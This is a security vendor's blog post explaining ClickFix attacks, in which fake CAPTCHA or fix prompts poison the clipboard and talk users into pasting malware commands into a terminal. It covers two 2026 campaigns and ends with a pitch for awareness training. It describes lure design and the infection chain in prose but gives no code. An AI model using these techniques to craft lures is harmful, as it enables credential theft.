ClickFix Attacks: How Hackers Make Your Employees Run Malware Themselves

Thomas Le Coz

Thomas Le Coz

Social Engineering
Summarize with:

ClickFix is not a vulnerability in your software. It is a vulnerability in how people respond to problems on their computers. That distinction is what makes it so difficult to stop and so important to understand. First documented in April 2024, the technique has grown at an alarming pace. According to ESET telemetry, ClickFix-based attacks surged by 517% in 2025 alone. Just recently, two separate campaigns reported within days of each other show that operators are still finding new ways to evolve the method, and that no industry or user profile is immune.

Key Takeaways

  • ClickFix tricks users into running malware themselves by disguising a malicious clipboard command as a routine troubleshooting or verification step.
  • In February 2026, Microsoft identified a new variant that abuses Windows Terminal instead of the Run dialog, bypassing detections designed to catch the classic technique.
  • A parallel campaign targeted crypto and Web3 professionals on LinkedIn using fake VC personas, fake Zoom links, and a spoofed Cloudflare CAPTCHA to deliver cross-platform payloads.
  • Traditional security tools largely cannot stop ClickFix because there is no file download or exploit to flag: the user executes the command themselves.
  • Security awareness training is the most effective defense: employees who recognize the pattern can stop the attack before a single command runs.

What Is a ClickFix Attack?

The ClickFix tactic is straightforward:

  1. A targeted user lands on a compromised or fake webpage and encounters what looks like a technical error: a broken document, a failed verification, a CAPTCHA prompt.
  2. A button or modal instructs them to follow a simple fix. When they click, a malicious command is silently copied to their clipboard. They are then guided to open a terminal or run dialog, paste the content, and press Enter.
  3. That is it. The user has executed malware themselves, with their own system privileges, in a way that bypasses most automated defenses. No download dialog. No suspicious email attachment. No alert from the operating system.

ClickFix Attack Plan

The name comes from that "fix" button, though not all variants use one. Some frame the interaction as a bot verification. Others impersonate Cloudflare security checks. The lure varies; the mechanism stays the same.

Learn more about ClickFix attacks here →

Two Attacks from the Same Week

Microsoft Flags a New Windows Terminal Variant

On March 6, 2026, the Microsoft Threat Intelligence team disclosed a ClickFix campaign that introduced a notable technical shift. It allows for fast deployment of Lumma Stealer (also known as LummaC2), a famous infostealer malware.

  • Rather than directing victims to the classic Windows Run dialog (Win + R), this variant instructed targets to use the Windows + X shortcut to launch Windows Terminal directly, guiding users into a privileged command execution environment that looks more like legitimate administrative work.
  • This approach bypasses security detections specifically designed to flag Run dialog abuse, while Windows Terminal itself lends the action an air of technical legitimacy.
  • Once the user pasted a hex-encoded, XOR-compressed command into the terminal, it spawned additional PowerShell instances responsible for decoding the script, downloading a ZIP payload, configuring Microsoft Defender exclusions, and ultimately deploying Lumma Stealer by injecting it into Chrome and Edge browser processes.

Fig13-ClickFix-impersonation-1.webp

One of the ClickFix lure detected by Microsoft Threat Intelligence, spoofing Cloudflare Turnstile on a compromised site - Image courtesy of Microsoft Threat Intelligence

Lumma Stealer then harvested stored credentials, session tokens, and banking information from browser storage files before sending them to attacker-controlled infrastructure. Microsoft also identified a second attack path involving MSBuild.exe and a technique known as etherhiding to connect to blockchain RPC endpoints, a sign of how multi-layered these post-infection chains have become.

Crypto and Web3 Professionals Targeted via Fake LinkedIn VCs

On March 5, a separate investigation by Moonlock Lab into a campaign that used a much more elaborate social engineering setup. Attackers posed as executives from fake venture capital funds with names like SolidBit Capital, MegaBit, and Lumax Capital, using polished LinkedIn profiles and tailored outreach messages that referenced targets' recent work.

  • The goal was to build enough trust to get a meeting scheduled. Instead of standard corporate tooling, victims were steered toward Calendly pages that redirected to spoofed Zoom or Google Meet links hosted on attacker-controlled domains.
  • Once a target clicked the meeting link, they landed on a cloned conference page overlaid with what appeared to be a Cloudflare CAPTCHA. The page rendered a familiar "I'm not a robot" checkbox, but no genuine Cloudflare challenge tokens or scripts were present: everything was local HTML and CSS controlled by the attacker.
  • Clicking the checkbox silently poisoned the clipboard with an OS-specific command, then a second modal walked the user through executing it in a terminal.

A-fraudulent-Cloudflare-verification-popup-instructing-a-user-to-paste-malicious-commands-692x415.webp

Another spoofed Cloudflare page used as a ClickFix lure - Image courtesy of Moonlock Lab

Moonlock Lab linked this activity to fully undetectable macOS binaries that initially scored zero detections on VirusTotal. On Windows, the chain used hidden PowerShell to pull and execute a remote script directly in memory, leaving no obvious file on disk. Researchers noted operational overlaps with UNC1069, a financially motivated group with reported ties to North Korea that has previously used ClickFix in Zoom-themed attacks against cryptocurrency organizations.

Why ClickFix Is So Hard to Stop with Technical Controls Alone

Most security tooling is built around a relatively simple model: detect a malicious file, block a malicious URL, or catch a known exploit pattern. ClickFix sidesteps all of this because the delivery mechanism is the user's own hands.

There is no email attachment to scan. No drive-by download to flag. The malicious command arrives via the clipboard and is typed into a terminal by a real human being. To a logging system, it looks like an administrator running a command.

Because the victim executes the command manually, many traditional defenses such as download filters and exploit detection never trigger, making ClickFix an effective living-off-the-user technique.

Technical mitigations help at the margins:

  1. Restricting the Windows Run dialog via Group Policy,
  2. Blocking execution of mshta.exe and PowerShell from user directories,
  3. Deploying endpoint detection and response solutions capable of catching post-execution behavior.

But none of these prevent a motivated user from following a convincing set of instructions in a terminal window that looks just like their normal work environment.

The Real Defense Is Awareness Training

Both campaigns, despite very different targeting and delivery, failed at the same point in the attack chain: the moment a user realizes something is off.

In the LinkedIn VC campaign, one target became suspicious when the “investor” refused a legitimate Google Meet and insisted on using their own link. That hesitation was enough to avoid compromise. This is exactly what security awareness training is meant to produce. Not memorized rules, but the kind of practiced instinct that makes an unusual request feel wrong before it becomes a crisis.

For example, employees who understand how ClickFix works know that no legitimate troubleshooting process, CAPTCHA, or investor onboarding flow will ever ask them to open a terminal and paste commands. That knowledge can turn a sophisticated, multi-stage attack into something recognizable, thus avoidable.

Improve your employees reactiveness with Arsen

ClickFix is not going away. The two March 2026 campaigns show operators actively refining the technique, expanding the lures, and targeting new platforms and audiences. The method is cheap to deploy, hard to detect automatically, and brutally effective against users who have never seen it before.

For organizations, the implication is clear: training must include current social engineering techniques by name, with realistic scenarios that reflect how attacks actually appear today. Generic phishing awareness is no longer enough when attackers are building fake LinkedIn profiles, Cloudflare verifications, and Windows 11 interfaces to make their instructions look routine.

Modern CSAT solutions liked Arsen help you assess and train your employee agains such attacks, by running learn-by-doing simulations training that creates transposable reflexes when users face phishing.

Learn more about our ClickFix attack simulations →

Request a demo →

Arsen offers a wide range of ClickFix phishing scenarios to test your team:

Arsen ClickFix Gif Demo

Can your team spot a vishing attack?

Test them and find your blind spots before attackers do.

Don't miss an article

No spam, ever. We'll never share your email address and you can opt out at any time.

Next article

AI-Enhanced Vishing in Financial Services: How Voice Cloning Is Outpacing Your Defenses

AI-Enhanced Vishing in Financial Services: How Voice Cloning Is Outpacing Your Defenses

AI voice cloning has turned vishing into a scalable, high-precision weapon against financial institutions. A Canadian...

Vishing